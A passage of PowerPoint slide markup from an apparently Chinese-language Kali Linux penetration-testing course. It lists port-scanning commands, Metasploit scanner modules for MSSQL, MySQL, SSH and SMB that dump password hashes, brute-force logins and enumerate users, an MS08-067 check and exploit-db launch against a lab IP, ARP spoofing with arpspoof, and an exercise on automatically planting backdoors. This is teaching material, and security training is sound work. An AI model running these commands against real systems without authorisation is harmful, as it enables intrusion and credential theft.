        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6267041" y="2851273"/>
            <a:ext cx="200384" cy="302537"/>
            <a:chOff x="549275" y="4406901"/>
            <a:chExt cx="161926" cy="244475"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56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63"/>
            <p:cNvSpPr/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800">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="135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0" name="任意多边形 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1512925" y="795736"/>
            <a:ext cx="4814316" cy="5198364"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 18288 w 6419088"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6931152"/>
              <a:gd name="connsiteX1" fmla="*/ 4809744 w 6419088"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6931152"/>
              <a:gd name="connsiteX2" fmla="*/ 6419088 w 6419088"/>
              <a:gd name="connsiteY2" fmla="*/ 6931152 h 6931152"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 6419088"/>
              <a:gd name="connsiteY3" fmla="*/ 6931152 h 6931152"/>
              <a:gd name="connsiteX4" fmla="*/ 18288 w 6419088"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 693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9088" h="6931152">
                <a:moveTo>
                  <a:pt x="18288" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4809744" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6419088" y="6931152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6931152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18288" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="18283C">
              <a:alpha val="77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685800">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="135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323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Nmap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30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12" y="1323872"/>
            <a:ext cx="5337528" cy="1704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11" y="3707085"/>
            <a:ext cx="5514809" cy="224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服务枚举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9888" y="1277748"/>
            <a:ext cx="5000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dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>unicornscan -m U -Iv 192.168.56.103:1-65535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00" y="1970376"/>
            <a:ext cx="9004572" cy="12010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94148" y="33438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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Amap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88" y="4162597"/>
            <a:ext cx="9004572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0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Metasploit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sql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3926" y="1661636"/>
            <a:ext cx="6963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使用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auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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mssql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/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下的模块探测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SQL server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的信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1228531" y="2837293"/>
            <a:ext cx="696374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mssql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mssql_hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  //dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hash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mssql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mssql_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>     //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>密码爆破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mssql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mssql_ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>嗅探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mssql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mssql_schemadump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25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Metasploit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mysql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1556" y="1602243"/>
            <a:ext cx="5934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使用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auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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mysql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/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下的模块探测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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mysql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信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1294228" y="2311853"/>
            <a:ext cx="7000686" cy="333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mysql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mysql_authbypass_hashdump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mysql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mysql_file_enum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mysql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mysql_hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   //dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hash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mysql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mysql_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>密码爆破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mysql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mysql_schemadump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mysql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mysql_version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>查看版本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="247039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Metasploit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ssh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3958" y="1769714"/>
            <a:ext cx="5344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使用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auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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ssh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/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下的模块探测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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ssh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信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099231" y="2393096"/>
            <a:ext cx="6096000" cy="33295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ssh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cerberus_sftp_enumusers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ssh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detect_kippo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ssh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ssh_enumusers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>     //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>枚举用户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ssh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ssh_identify_pubkeys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ssh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ssh_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>         //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>密码爆破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ssh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ssh_login_pubkey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ssh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ssh_version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>       //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>查看版本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217824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metasploit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扫描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3732" y="189081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使用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auxiliary/scanner/discovery/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下模块进行扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1291670" y="2543755"/>
            <a:ext cx="7619063" cy="3330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use auxiliary/scanner/discovery/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>arp_sweep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use auxiliary/scanner/discovery/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>empty_udp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use auxiliary/scanner/discovery/ipv6_multicast_ping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use auxiliary/scanner/discovery/ipv6_neighbor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use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement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use auxiliary/scanner/discovery/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>udp_probe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use auxiliary/scanner/discovery/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>udp_sweep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4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Metasploit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探测主机端口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41921" y="1828893"/>
            <a:ext cx="6048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使用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auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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portscan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/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下的模块探测主机端口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1319280" y="2681772"/>
            <a:ext cx="6359814" cy="2387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portscan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ack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      //ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>防火墙扫描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portscan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ftpbounce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>// FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>跳端口扫描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portscan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syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      //SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>端口扫描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portscan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tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      //TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>端口扫描</a:t>
            </a:r>
          </a:p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auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>portscan</a:t>
            </a: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xmas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>     //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>TCP”XMas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>端口扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12060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metasploit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收集信息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8984" y="1396153"/>
            <a:ext cx="6852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使用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auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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smb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/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下的模块来识别搜集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windows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信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1378842" y="2058293"/>
            <a:ext cx="7799540" cy="419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pipe_auditor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pipe_dcerpc_auditor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DCERPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>信息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psexec_loggedin_users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/smb2                //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SMB2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>协议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smb_enum_gpp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smb_enumshares</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>     //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>扫描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zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>共享文件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smb_enumusers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      //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zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>枚举系统用户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smb_enumusers_domain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smb_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>         //SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>登录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smb_lookupsid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>     //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>扫描组的用户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smb_uninit_cred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>smb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smb_version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>       //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>扫描系统版本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8046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metasploit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自动攻击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38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116" y="1565999"/>
            <a:ext cx="9114310" cy="29994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8116" y="510279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题目：多个目标，自动创建后门。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30985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Ms08_067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39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93938" y="1257565"/>
            <a:ext cx="8488473" cy="2125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nmap -v -p 139, 445 --script=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-check-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> --script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=unsafe=1 192.168.31.205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searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ms08-067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python /usr/share/exploitdb/platforms/windows/remote/7132.py 192.168.31.205 1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39" y="3479055"/>
            <a:ext cx="7872780" cy="290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4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Kali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基础配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="320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3200">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b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弱点测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="320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3200">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="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97450" y="3173037"/>
            <a:ext cx="6523037" cy="2970587"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>渗透测试最重要的阶段之一就是信息收集。为了启动渗透测试，用户需要收集关于目标主机的基本信息。用户得到的信息越多，渗透测试成功的概率也就越高。枚举服务；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>测试网络范围；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>识别活跃的主机和查看打开的端口；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>系统指纹识别；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>服务指纹识别；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>其他信息收集手段；</a:t>
            </a:r>
          </a:p>
          <a:p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 err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Maltego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>收集信息；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>绘制网络图。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332269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linux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arp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欺骗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41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8783" y="1900483"/>
            <a:ext cx="6096000" cy="285866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dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>arpspoof -t 192.168.65.129 192.168.65.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pP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en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> –n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>linux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显示</a:t>
            </a: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zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>缓存</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pP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en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -s 10.1.1.1 00:11:22:33:44:55:66 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>添加</a:t>
            </a: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zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>缓存</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pP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en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
